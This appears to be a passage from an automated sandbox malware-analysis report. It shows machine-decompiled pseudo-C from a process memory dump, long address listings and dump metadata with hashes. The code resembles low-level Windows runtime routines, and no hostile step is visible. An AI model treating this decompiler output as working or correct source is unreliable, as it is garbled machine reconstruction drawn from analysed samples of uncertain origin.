                        						if(_t494[1] <= _t301) {
                        							L10:
                        							__eflags =  *(_t474 - 5) & 0x00000040;
                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                        								L12:
                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                        									goto L92;
                        								}
                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                        									goto L92;
                        								}
                        								__eflags = _t442 -  *(_t474 - 0x11);
                        								if(_t442 !=  *(_t474 - 0x11)) {
                        									goto L92;
                        								}
                        								L15:
                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                        								 *(_t528 - 0xc0) = _t306;
                        								 *(_t528 - 0xa4) = _t306;
                        								__eflags =  *0x2c860e8;
                        								if( *0x2c860e8 != 0) {
                        									__eflags = _t306 - 0x40;
                        									if(_t306 < 0x40) {
                        										L20:
                        										asm("lock inc dword [eax]");
                        										_t310 =  *0x2c860e8; // 0x0
                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                        										__eflags = _t311 & 0x00000001;
                        										if((_t311 & 0x00000001) == 0) {
                        											 *(_t528 - 0xa0) = _t311;
                        											_t475 = _t427;
                        											 *(_t528 - 0x74) = _t427;
                        											__eflags = _t475;
                        											if(_t475 != 0) {
                        												L91:
                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        												goto L92;
                        											}
                        											asm("sbb edi, edi");
                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                        											_t511 = _t498;
                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                        											__eflags =  *(_t312 - 5) & 1;
                        											if(( *(_t312 - 5) & 1) != 0) {
                        												_push(_t528 - 0x98);
                        												_push(0x4c);
                        												_push(_t528 - 0x70);
                        												_push(1);
                        												_push(0xfffffffa);
                        												_t412 = E02BD9710();
                        												_t475 = _t427;
                        												__eflags = _t412;
                        												if(_t412 >= 0) {
                        													_t414 =  *(_t528 - 0x98) - 8;
                        													 *(_t528 - 0x98) = _t414;
                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                        													 *(_t528 - 0x8c) = _t416;
                        													 *(_t528 - 0x79) = 1;
                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                        													__eflags = _t511;
                        												}
                        											}
                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                        											__eflags = _t446 & 0x00000004;
                        											if((_t446 & 0x00000004) != 0) {
                        												__eflags =  *(_t528 - 0x9c);
                        												if( *(_t528 - 0x9c) != 0) {
                        													 *(_t528 - 0x7a) = 1;
                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                        													__eflags = _t511;
                        												}
                        											}
                        											_t313 = 2;
                        											_t447 = _t446 & _t313;
                        											__eflags = _t447;
                        											 *(_t528 - 0xd4) = _t447;
                        											if(_t447 != 0) {
                        												_t406 = 0x10;
                        												_t511 = _t511 + _t406;
                        												__eflags = _t511;
                        											}
                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                        											 *(_t528 - 0x88) = _t427;
                        											__eflags =  *(_t528 + 0x1c);
                        											if( *(_t528 + 0x1c) <= 0) {
                        												L45:
                        												__eflags =  *(_t528 - 0xb0);
                        												if( *(_t528 - 0xb0) != 0) {
                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        													__eflags = _t511;
                        												}
                        												__eflags = _t475;
                        												if(_t475 != 0) {
                        													asm("lock dec dword [ecx+edx*8+0x4]");
                        													goto L100;
                        												} else {
                        													_t494[3] = _t511;
                        													_t451 =  *(_t528 - 0xa0);
                        													_t427 = E02BD6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                        													 *(_t528 - 0x88) = _t427;
                        													__eflags = _t427;
                        													if(_t427 == 0) {
                        														__eflags = _t511 - 0xfff8;
                        														if(_t511 <= 0xfff8) {
                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                        															asm("sbb ecx, ecx");
                        															__eflags = (_t451 & 0x000000e2) + 8;
                        														}
                        														asm("lock dec dword [eax+edx*8+0x4]");
                        														L100:
                        														goto L101;
                        													}
                        													_t453 =  *(_t528 - 0xa0);
                        													 *_t494 = _t453;
                        													_t494[1] = _t427;
                        													_t494[2] =  *(_t528 - 0xbc);
                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x14);
                        													if( *(_t528 + 0x14) == 0) {
                        														__eflags =  *[fs:0x18] + 0xf50;
                        													}
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x18);
                        													if( *(_t528 + 0x18) == 0) {
                        														_t454 =  *(_t528 - 0x80);
                        														_t479 =  *(_t528 - 0x78);
                        														_t327 = 1;
                        														__eflags = 1;
                        													} else {
                        														_t146 = _t427 + 0x50; // 0x50
                        														_t454 = _t146;
                        														 *(_t528 - 0x80) = _t454;
                        														_t382 = 0x18;
                        														 *_t454 = _t382;
                        														 *((short*)(_t454 + 2)) = 1;
                        														_t385 = 0x10;
                        														 *((short*)(_t454 + 6)) = _t385;
                        														 *(_t454 + 4) = 0;
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = 0x68;
                        														 *(_t528 - 0x78) = _t479;
                        													}
                        													__eflags =  *(_t528 - 0x79) - _t327;
                        													if( *(_t528 - 0x79) == _t327) {
                        														_t524 = _t479 + _t427;
                        														_t508 =  *(_t528 - 0x8c);
                        														 *_t524 = _t508;
                        														_t373 = 2;
                        														 *((short*)(_t524 + 2)) = _t373;
                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                        														 *((short*)(_t524 + 4)) = 0;
                        														_t167 = _t524 + 8; // 0x8
                        														E02BDF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t380 =  *(_t528 - 0x80);
                        														__eflags = _t380;
                        														if(_t380 != 0) {
                        															_t173 = _t380 + 4;
                        															 *_t173 =  *(_t380 + 4) | 1;
                        															__eflags =  *_t173;
                        														}
                        														_t454 = _t524;
                        														 *(_t528 - 0x80) = _t454;
                        														_t327 = 1;
                        														__eflags = 1;
                        													}
                        													__eflags =  *(_t528 - 0xd4);
                        													if( *(_t528 - 0xd4) == 0) {
                        														_t505 =  *(_t528 - 0x80);
                        													} else {
                        														_t505 = _t479 + _t427;
                        														_t523 = 0x10;
                        														 *_t505 = _t523;
                        														_t367 = 3;
                        														 *((short*)(_t505 + 2)) = _t367;
                        														_t368 = 4;
                        														 *((short*)(_t505 + 6)) = _t368;
                        														 *(_t505 + 4) = 0;
                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = _t479 + _t523;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t454;
                        														if(_t454 != 0) {
                        															_t186 = _t454 + 4;
                        															 *_t186 =  *(_t454 + 4) | 1;
                        															__eflags =  *_t186;
                        														}
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0x7a) - _t327;
                        													if( *(_t528 - 0x7a) == _t327) {
                        														 *(_t528 - 0xd4) = _t479 + _t427;
                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                        														E02BDF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + _t522;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t199 = _t505 + 4;
                        															 *_t199 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t199;
                        														}
                        														_t505 =  *(_t528 - 0xd4);
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0xa8);
                        													if( *(_t528 - 0xa8) != 0) {
                        														_t356 = _t479 + _t427;
                        														 *(_t528 - 0xd4) = _t356;
                        														_t462 =  *(_t528 - 0xac);
                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                        														_t485 = 0xc;
                        														 *((short*)(_t356 + 2)) = _t485;
                        														 *(_t356 + 6) = _t462;
                        														 *((short*)(_t356 + 4)) = 0;
                        														_t211 = _t356 + 8; // 0x9
                        														E02BDF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                        														E02BDFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0x18;
                        														_t427 =  *(_t528 - 0x88);
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t505 =  *(_t528 - 0xd4);
                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t362 =  *(_t528 - 0x80);
                        														__eflags = _t362;
                        														if(_t362 != 0) {
                        															_t222 = _t362 + 4;
                        															 *_t222 =  *(_t362 + 4) | 1;
                        															__eflags =  *_t222;
                        														}
                        													}
                        													__eflags =  *(_t528 - 0xb0);
                        													if( *(_t528 - 0xb0) != 0) {
                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                        														_t458 = 0xb;
                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                        														E02BDFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t241 = _t505 + 4;
                        															 *_t241 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t241;
                        														}
                        													}
                        													_t328 =  *(_t528 + 0x1c);
                        													__eflags = _t328;
                        													if(_t328 == 0) {
                        														L87:
                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                        														_t455 =  *(_t528 - 0xdc);
                        														 *(_t427 + 0x14) = _t455;
                        														_t480 =  *(_t528 - 0xa0);
                        														_t517 = 3;
                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                        															asm("rdtsc");
                        															 *(_t427 + 0x3c) = _t480;
                        														} else {
                        															 *(_t427 + 0x3c) = _t455;
                        														}
                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                        														_t456 =  *[fs:0x18];
                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                        														_t427 = 0;
                        														__eflags = 0;
                        														_t511 = 0x18;
                        														goto L91;
                        													} else {
                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                        														__eflags = _t519;
                        														 *(_t528 - 0x8c) = _t328;
                        														do {
                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                        																_t334 =  *_t519;
                        															} else {
                        																_t334 = 0;
                        															}
                        															_t336 = _t334 & 0x000000ff;
                        															__eflags = _t336;
                        															_t427 =  *(_t528 - 0x88);
                        															if(_t336 == 0) {
                        																_t481 = _t479 + _t506;
                        																__eflags = _t481;
                        																 *(_t528 - 0x78) = _t481;
                        																E02BDF3E0(_t479 + _t427, _t457, _t506);
                        																_t529 = _t529 + 0xc;
                        															} else {
                        																_t340 = _t336 - 1;
                        																__eflags = _t340;
                        																if(_t340 == 0) {
                        																	E02BDF3E0( *(_t528 - 0xb8), _t457, _t506);
                        																	_t529 = _t529 + 0xc;
                        																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
                        																} else {
                        																	__eflags = _t340 == 0;
                        																	if(_t340 == 0) {
                        																		__eflags = _t506 - 8;
                        																		if(_t506 == 8) {
                        																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
                        																			 *(_t528 - 0xdc) =  *(_t457 + 4);
                        																		}
                        																	}
                        																}
                        															}
                        															_t339 = 0x10;
                        															_t519 = _t519 + _t339;
                        															_t263 = _t528 - 0x8c;
                        															 *_t263 =  *(_t528 - 0x8c) - 1;
                        															__eflags =  *_t263;
                        															_t479 =  *(_t528 - 0x78);
                        														} while ( *_t263 != 0);
                        														goto L87;
                        													}
                        												}
                        											} else {
                        												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
                        												 *(_t528 - 0xa2) = _t392;
                        												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
                        												__eflags = _t469;
                        												while(1) {
                        													 *(_t528 - 0xe4) = _t511;
                        													__eflags = _t392;
                        													_t393 = _t427;
                        													if(_t392 != 0) {
                        														_t393 =  *((intOrPtr*)(_t469 + 4));
                        													}
                        													_t395 = (_t393 & 0x000000ff) - _t427;
                        													__eflags = _t395;
                        													if(_t395 == 0) {
                        														_t511 = _t511 +  *_t469;
                        														__eflags = _t511;
                        													} else {
                        														_t398 = _t395 - 1;
                        														__eflags = _t398;
                        														if(_t398 == 0) {
                        															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
                        															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
                        														} else {
                        															__eflags = _t398 == 1;
                        															if(_t398 == 1) {
                        																 *(_t528 - 0xa8) =  *(_t469 - 8);
                        																_t402 =  *_t469 & 0x0000ffff;
                        																 *(_t528 - 0xac) = _t402;
                        																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        															}
                        														}
                        													}
                        													__eflags = _t511 -  *(_t528 - 0xe4);
                        													if(_t511 <  *(_t528 - 0xe4)) {
                        														break;
                        													}
                        													_t397 =  *(_t528 - 0x88) + 1;
                        													 *(_t528 - 0x88) = _t397;
                        													_t469 = _t469 + 0x10;
                        													__eflags = _t397 -  *(_t528 + 0x1c);
                        													_t392 =  *(_t528 - 0xa2);
                        													if(_t397 <  *(_t528 + 0x1c)) {
                        														continue;
                        													}
                        													goto L45;
                        												}
                        												_t475 = 0x216;
                        												 *(_t528 - 0x74) = 0x216;
                        												goto L45;
                        											}
                        										} else {
                        											asm("lock dec dword [eax+ecx*8+0x4]");
                        											goto L16;
                        										}
                        									}
                        									_t491 = E02C64CAB(_t306, _t528 - 0xa4);
                        									 *(_t528 - 0x74) = _t491;
                        									__eflags = _t491;
                        									if(_t491 != 0) {
                        										goto L91;
                        									} else {
                        										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        										goto L20;
                        									}
                        								}
                        								L16:
                        								 *(_t528 - 0x74) = 0x1069;
                        								L93:
                        								_t298 =  *(_t528 - 0xd0) + 1;
                        								 *(_t528 - 0xd0) = _t298;
                        								_t474 = _t474 + _t511;
                        								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        								_t494 = 4;
                        								__eflags = _t298 - _t494;
                        								if(_t298 >= _t494) {
                        									goto L100;
                        								}
                        								_t494 =  *(_t528 - 0xcc);
                        								_t435 = _t298;
                        								continue;
                        							}
                        							__eflags = _t494[2] | _t494[3];
                        							if((_t494[2] | _t494[3]) == 0) {
                        								goto L15;
                        							}
                        							goto L12;
                        						}
                        						__eflags = _t301;
                        						if(_t301 != 0) {
                        							goto L92;
                        						}
                        						goto L10;
                        						L92:
                        						goto L93;
                        					}
                        				} else {
                        					_push(0x57);
                        					L101:
                        					return E02BED130(_t427, _t494, _t511);
                        				}
                        			}










































































                        0x02c65ba5
                        0x02c65baa
                        0x02c65baf
                        0x02c65bb4
                        0x02c65bb6
                        0x02c65bbc
                        0x02c65bbe
                        0x02c65bc4
                        0x02c65bcd
                        0x02c65bd3
                        0x02c65bd6
                        0x02c65bdc
                        0x02c65be0
                        0x02c65be3
                        0x02c65beb
                        0x02c65bf2
                        0x02c65bf8
                        0x02c65bfe
                        0x02c65c04
                        0x02c65c0e
                        0x02c65c18
                        0x02c65c1f
                        0x02c65c25
                        0x02c65c2a
                        0x02c65c2c
                        0x02c65c32
                        0x02c65c3a
                        0x02c65c3f
                        0x02c65c42
                        0x02c65c48
                        0x02c65c5b
                        0x02c65c5b
                        0x02c65c2c
                        0x02c65cb7
                        0x02c65cb9
                        0x02c65cbf
                        0x02c65cc2
                        0x02c65cca
                        0x02c65ccb
                        0x02c65ccb
                        0x02c65cd1
                        0x02c65cd7
                        0x02c65cda
                        0x02c65ce1
                        0x02c65ce4
                        0x02c65ce7
                        0x02c65ced
                        0x02c65cf3
                        0x02c65cf9
                        0x02c65cff
                        0x02c65d08
                        0x02c65d0a
                        0x02c65d0e
                        0x02c65d10
                        0x00000000
                        0x00000000
                        0x02c65d16
                        0x02c65d1a
                        0x00000000
                        0x00000000
                        0x02c65d20
                        0x02c65d22
                        0x02c65d25
                        0x02c65d2f
                        0x02c65d2f
                        0x02c65d33
                        0x02c65d3d
                        0x02c65d49
                        0x02c65d4b
                        0x00000000
                        0x00000000
                        0x02c65d5a
                        0x02c65d5d
                        0x02c65d60
                        0x00000000
                        0x00000000
                        0x02c65d66
                        0x02c65d69
                        0x00000000
                        0x00000000
                        0x02c65d6f
                        0x02c65d6f
                        0x02c65d73
                        0x02c65d79
                        0x02c65d7f
                        0x02c65d86
                        0x02c65d95
                        0x02c65d98
                        0x02c65dba
                        0x02c65dcb
                        0x02c65dce
                        0x02c65dd3
                        0x02c65dd6
                        0x02c65dd8
                        0x02c65de6
                        0x02c65dec
                        0x02c65dee
                        0x02c65df1
                        0x02c65df3
                        0x02c6635a
                        0x02c6635a
                        0x00000000
                        0x02c6635a
                        0x02c65dfe
                        0x02c65e02
                        0x02c65e05
                        0x02c65e07
                        0x02c65e10
                        0x02c65e13
                        0x02c65e1b
                        0x02c65e1c
                        0x02c65e21
                        0x02c65e22
                        0x02c65e23
                        0x02c65e25
                        0x02c65e2a
                        0x02c65e2c
                        0x02c65e2e
                        0x02c65e36
                        0x02c65e39
                        0x02c65e42
                        0x02c65e47
                        0x02c65e4d
                        0x02c65e54
                        0x02c65e54
                        0x02c65e54
                        0x02c65e2e
                        0x02c65e5c
                        0x02c65e5f
                        0x02c65e62
                        0x02c65e64
                        0x02c65e6b
                        0x02c65e70
                        0x02c65e7a
                        0x02c65e7a
                        0x02c65e7a
                        0x02c65e6b
                        0x02c65e7e
                        0x02c65e7f
                        0x02c65e7f
                        0x02c65e81
                        0x02c65e87
                        0x02c65e8b
                        0x02c65e8c
                        0x02c65e8c
                        0x02c65e8c
                        0x02c65e9a
                        0x02c65e9c
                        0x02c65ea2
                        0x02c65ea6
                        0x02c65f50
                        0x02c65f50
                        0x02c65f57
                        0x02c65f66
                        0x02c65f66
                        0x02c65f66
                        0x02c65f68
                        0x02c65f6a
                        0x02c663d0
                        0x00000000
                        0x02c65f70
                        0x02c65f70
                        0x02c65f91
                        0x02c65f9c
                        0x02c65f9e
                        0x02c65fa4
                        0x02c65fa6
                        0x02c6638c
                        0x02c66392
                        0x02c663a1
                        0x02c663a7
                        0x02c663af
                        0x02c663af
                        0x02c663bd
                        0x02c663d8
                        0x00000000
                        0x02c663d8
                        0x02c65fac
                        0x02c65fb2
                        0x02c65fb4
                        0x02c65fbd
                        0x02c65fc6
                        0x02c65fce
                        0x02c65fd4
                        0x02c65fdc
                        0x02c65fec
                        0x02c65fed
                        0x02c65fee
                        0x02c65fef
                        0x02c65ff9
                        0x02c65ffa
                        0x02c65ffb
                        0x02c65ffc
                        0x02c66000
                        0x02c66004
                        0x02c66012
                        0x02c66012
                        0x02c66018
                        0x02c66019
                        0x02c6601a
                        0x02c6601b
                        0x02c6601c
                        0x02c66020
                        0x02c66059
                        0x02c6605c
                        0x02c66061
                        0x02c66061
                        0x02c66022
                        0x02c66022
                        0x02c66022
                        0x02c66025
                        0x02c6602a
                        0x02c6602b
                        0x02c66031
                        0x02c66037
                        0x02c66038
                        0x02c6603e
                        0x02c66048
                        0x02c66049
                        0x02c6604a
                        0x02c6604b
                        0x02c6604c
                        0x02c6604d
                        0x02c66053
                        0x02c66054
                        0x02c66054
                        0x02c66062
                        0x02c66065
                        0x02c66067
                        0x02c6606a
                        0x02c66070
                        0x02c66075
                        0x02c66076
                        0x02c66081
                        0x02c66087
                        0x02c66095
                        0x02c66099
                        0x02c6609e
                        0x02c660a4
                        0x02c660ae
                        0x02c660b0
                        0x02c660b3
                        0x02c660b6
                        0x02c660b8
                        0x02c660ba
                        0x02c660ba
                        0x02c660ba
                        0x02c660ba
                        0x02c660be
                        0x02c660c0
                        0x02c660c5
                        0x02c660c5
                        0x02c660c5
                        0x02c660c6
                        0x02c660cd
                        0x02c66114
                        0x02c660cf
                        0x02c660cf
                        0x02c660d4
                        0x02c660d5
                        0x02c660da
                        0x02c660db
                        0x02c660e1
                        0x02c660e2
                        0x02c660e8
                        0x02c660f8
                        0x02c660fd
                        0x02c660fe
                        0x02c66102
                        0x02c66104
                        0x02c66107
                        0x02c66109
                        0x02c6610b
                        0x02c6610b
                        0x02c6610b
                        0x02c6610b
                        0x02c6610f
                        0x02c6610f
                        0x02c66117
                        0x02c6611a
                        0x02c6611f
                        0x02c66125
                        0x02c66134
                        0x02c66139
                        0x02c6613f
                        0x02c66146
                        0x02c66148
                        0x02c6614b
                        0x02c6614d
                        0x02c6614f
                        0x02c6614f
                        0x02c6614f
                        0x02c6614f
                        0x02c66153
                        0x02c66159
                        0x02c66159
                        0x02c6615c
                        0x02c66163
                        0x02c66169
                        0x02c6616c
                        0x02c66172
                        0x02c66181
                        0x02c66186
                        0x02c66187
                        0x02c6618b
                        0x02c66191
                        0x02c66195
                        0x02c661a3
                        0x02c661bb
                        0x02c661c0
                        0x02c661c3
                        0x02c661cc
                        0x02c661d0
                        0x02c661dc
                        0x02c661de
                        0x02c661e1
                        0x02c661e4
                        0x02c661e6
                        0x02c661e8
                        0x02c661e8
                        0x02c661e8
                        0x02c661e8
                        0x02c661e6
                        0x02c661ec
                        0x02c661f3
                        0x02c66203
                        0x02c66209
                        0x02c6620a
                        0x02c66216
                        0x02c6621d
                        0x02c66227
                        0x02c66241
                        0x02c66246
                        0x02c6624c
                        0x02c66257
                        0x02c66259
                        0x02c6625c
                        0x02c6625e
                        0x02c66260
                        0x02c66260
                        0x02c66260
                        0x02c66260
                        0x02c6625e
                        0x02c66264
                        0x02c66267
                        0x02c66269
                        0x02c66315
                        0x02c66315
                        0x02c6631b
                        0x02c6631e
                        0x02c66324
                        0x02c66327
                        0x02c6632f
                        0x02c66330
                        0x02c66333
                        0x02c6633a
                        0x02c6633c
                        0x02c66335
                        0x02c66335
                        0x02c66335
                        0x02c6633f
                        0x02c66342
                        0x02c6634c
                        0x02c66352
                        0x02c66355
                        0x02c66355
                        0x02c66359
                        0x00000000
                        0x02c6626f
                        0x02c66275
                        0x02c66275
                        0x02c66278
                        0x02c6627e
                        0x02c6627e
                        0x02c66281
                        0x02c66287
                        0x02c6628d
                        0x02c66298
                        0x02c6629c
                        0x02c662a2
                        0x02c6629e
                        0x02c6629e
                        0x02c6629e
                        0x02c662a7
                        0x02c662a7
                        0x02c662aa
                        0x02c662b0
                        0x02c662f0
                        0x02c662f0
                        0x02c662f2
                        0x02c662f8
                        0x02c662fd
                        0x02c662b2
                        0x02c662b2
                        0x02c662b2
                        0x02c662b5
                        0x02c662dd
                        0x02c662e2
                        0x02c662e5
                        0x02c662b7
                        0x02c662b8
                        0x02c662bb
                        0x02c662bd
                        0x02c662c0
                        0x02c662c4
                        0x02c662cd
                        0x02c662cd
                        0x02c662c0
                        0x02c662bb
                        0x02c662b5
                        0x02c66302
                        0x02c66303
                        0x02c66305
                        0x02c66305
                        0x02c66305
                        0x02c6630c
                        0x02c6630c
                        0x00000000
                        0x02c6627e
                        0x02c66269
                        0x02c65eac
                        0x02c65ebb
                        0x02c65ebe
                        0x02c65ecb
                        0x02c65ecb
                        0x02c65ece
                        0x02c65ece
                        0x02c65ed4
                        0x02c65ed7
                        0x02c65ed9
                        0x02c65edb
                        0x02c65edb
                        0x02c65ee1
                        0x02c65ee1
                        0x02c65ee3
                        0x02c65f20
                        0x02c65f20
                        0x02c65ee5
                        0x02c65ee5
                        0x02c65ee5
                        0x02c65ee8
                        0x02c65f11
                        0x02c65f18
                        0x02c65eea
                        0x02c65eea
                        0x02c65eed
                        0x02c65ef2
                        0x02c65ef8
                        0x02c65efb
                        0x02c65f0a
                        0x02c65f0a
                        0x02c65eed
                        0x02c65ee8
                        0x02c65f22
                        0x02c65f28
                        0x00000000
                        0x00000000
                        0x02c65f30
                        0x02c65f31
                        0x02c65f37
                        0x02c65f3a
                        0x02c65f3d
                        0x02c65f44
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c65f46
                        0x02c65f48
                        0x02c65f4d
                        0x00000000
                        0x02c65f4d
                        0x02c65dda
                        0x02c65ddf
                        0x00000000
                        0x02c65ddf
                        0x02c65dd8
                        0x02c65da7
                        0x02c65da9
                        0x02c65dac
                        0x02c65dae
                        0x00000000
                        0x02c65db4
                        0x02c65db4
                        0x00000000
                        0x02c65db4
                        0x02c65dae
                        0x02c65d88
                        0x02c65d8d
                        0x02c66363
                        0x02c66369
                        0x02c6636a
                        0x02c66370
                        0x02c66372
                        0x02c6637a
                        0x02c6637b
                        0x02c6637d
                        0x00000000
                        0x00000000
                        0x02c6637f
                        0x02c66385
                        0x00000000
                        0x02c66385
                        0x02c65d38
                        0x02c65d3b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c65d3b
                        0x02c65d27
                        0x02c65d29
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02c66360
                        0x00000000
                        0x02c66360
                        0x02c65c10
                        0x02c65c10
                        0x02c663da
                        0x02c663e5
                        0x02c663e5

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5d01980471385018dca78b388b5d594679d8aaa78806e6e1ddcec3c2ebb228c0
                        • Instruction ID: 8d6df26f56b44f0141859569a8c5cc4221da4f8e8bf96dd8403dc9f69d22195f
                        • Opcode Fuzzy Hash: 5d01980471385018dca78b388b5d594679d8aaa78806e6e1ddcec3c2ebb228c0
                        • Instruction Fuzzy Hash: 56426C71D00229CFDB24CF68C884BA9B7B5FF89304F2481AAD85DEB242D7359A85CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E02BB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                        				signed int _v8;
                        				void* _v20;
                        				signed int _v24;
                        				char _v532;
                        				char _v540;
                        				signed short _v544;
                        				signed int _v548;
                        				signed short* _v552;
                        				signed short _v556;
                        				signed short* _v560;
                        				signed short* _v564;
                        				signed short* _v568;
                        				void* _v570;
                        				signed short* _v572;
                        				signed short _v576;
                        				signed int _v580;
                        				char _v581;
                        				void* _v584;
                        				unsigned int _v588;
                        				signed short* _v592;
                        				void* _v597;
                        				void* _v600;
                        				void* _v604;
                        				void* _v609;
                        				void* _v616;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				unsigned int _t161;
                        				signed int _t162;
                        				unsigned int _t163;
                        				void* _t169;
                        				signed short _t173;
                        				signed short _t177;
                        				signed short _t181;
                        				unsigned int _t182;
                        				signed int _t185;
